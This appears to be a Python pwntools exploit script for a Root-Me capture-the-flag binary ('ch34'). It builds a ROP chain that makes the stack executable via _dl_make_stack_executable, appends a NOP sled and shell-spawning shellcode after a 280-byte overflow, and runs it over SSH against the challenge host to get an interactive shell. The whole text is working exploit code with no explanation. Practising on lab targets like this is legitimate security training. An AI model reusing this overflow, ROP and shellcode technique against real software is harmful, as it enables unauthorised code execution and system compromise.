from pwn import * context.arch = "amd64" elf = ELF("ch34")rop = ROP(el

1. from pwn import *
2.  
3. context.arch = "amd64"
4.  
5. elf = ELF("ch34")
6. rop = ROP(elf)
7. rop.raw(next(elf.search(asm('pop rcx; ret;'))))
8. rop.raw(7)
9. rop.raw(next(elf.search(asm('pop rdx; ret;'))))
10. rop.raw(elf.symbols['__stack_prot'])
11. rop.raw(next(elf.search(asm('mov [rdx], rcx; ret;'))))
12.  
13. rop.call('_dl_make_stack_executable', [elf.symbols['__libc_stack_end']])
14. rop.raw(next(elf.search(asm('call rsp'))))
15.  
16. print(rop.dump())
17.  
18. payload = "A"*280 + str(rop) + "\x90"*128 + asm(shellcraft.sh())
19.  
20. s = ssh(host='challenge03.root-me.org', port=2223, user='app-systeme-ch34', password='app-systeme-ch34')
21. p = s.process(['./ch34'])
22. p.sendline(payload)
23. p.interactive()